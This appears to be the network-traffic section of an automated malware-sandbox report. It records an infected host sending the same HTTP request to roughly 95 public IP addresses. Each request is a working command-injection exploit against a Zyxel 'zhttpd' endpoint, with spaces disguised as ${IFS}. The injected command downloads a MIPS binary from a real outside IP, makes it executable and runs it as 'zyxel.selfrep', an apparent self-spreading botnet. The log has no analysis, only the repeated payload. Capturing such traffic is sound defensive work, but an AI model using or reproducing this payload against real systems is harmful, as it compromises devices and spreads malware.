                                            Jan 14, 2024 15:50:28.230182886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1245192.168.2.234992240.59.94.77443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230220079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1246192.168.2.2353994219.241.75.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230243921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1247192.168.2.233326270.178.177.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230284929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1248192.168.2.2341854169.145.198.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230310917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1249192.168.2.234836681.26.247.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230321884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1250192.168.2.235957694.202.24.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230338097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1251192.168.2.235418624.92.43.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230359077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1252192.168.2.2356044188.251.211.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230417967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1253192.168.2.235116081.197.170.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230458021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1254192.168.2.2359134151.90.125.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230475903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1255192.168.2.2357348135.192.189.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230496883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1256192.168.2.233980227.151.125.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230518103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1257192.168.2.2344108126.9.201.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230524063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1258192.168.2.234786886.172.158.8443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230528116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1259192.168.2.2341916169.105.39.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230561018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1260192.168.2.233458485.78.55.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230595112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1261192.168.2.23601201.161.82.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230643988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1262192.168.2.234880261.14.125.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230660915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1263192.168.2.235198265.20.11.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230703115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1264192.168.2.234355039.252.137.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230741978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1265192.168.2.2343924138.175.192.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230773926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1266192.168.2.2338514112.112.243.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230802059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1267192.168.2.2335746133.93.90.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230834961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1268192.168.2.234623295.104.21.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230868101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1269192.168.2.236081649.242.178.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230892897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1270192.168.2.234631681.236.142.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230921030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1271192.168.2.233931093.96.50.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230947971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1272192.168.2.23496961.96.50.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.230982065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1273192.168.2.236072023.106.231.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231005907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1274192.168.2.2346730189.166.230.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231033087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1275192.168.2.2355022168.215.142.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231071949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1276192.168.2.2339966150.93.132.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231102943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1277192.168.2.234440420.65.206.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231129885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1278192.168.2.235856487.235.30.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231148005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1279192.168.2.2349292178.38.221.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231168032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1280192.168.2.233844261.35.225.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231240988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1281192.168.2.2341694191.127.103.208443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231265068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1282192.168.2.2341190128.202.36.32443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231292963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1283192.168.2.2355164100.4.126.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231311083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1284192.168.2.2342010145.162.203.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231359959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1285192.168.2.2356406137.195.16.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231385946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1286192.168.2.2338494142.9.113.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231426001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1287192.168.2.2342750105.163.42.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231451988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1288192.168.2.2341840144.119.40.166443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231460094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1289192.168.2.2339896113.45.36.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231493950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1290192.168.2.234302620.208.153.190443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231534004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1291192.168.2.234975476.238.110.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231574059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1292192.168.2.2352176203.25.20.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231585026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1293192.168.2.233520684.143.5.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231635094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1294192.168.2.235784888.6.164.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231635094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1295192.168.2.2335426118.232.127.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231677055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1296192.168.2.2344190160.150.153.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231703043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1297192.168.2.2334970149.68.237.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231746912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1298192.168.2.233673668.140.160.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231791973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1299192.168.2.235113224.215.175.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231812954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1300192.168.2.2350102158.95.9.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231822014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1301192.168.2.234154668.72.134.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231851101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1302192.168.2.234889278.62.149.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231893063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1303192.168.2.2350684112.251.10.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231898069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1304192.168.2.234691638.104.54.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231960058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1305192.168.2.2339474122.195.227.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.231982946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1306192.168.2.2354034123.86.56.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:28.232007980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1307192.168.2.2355442147.47.4.121443
                                            TimestampBytes transferredDirectionData
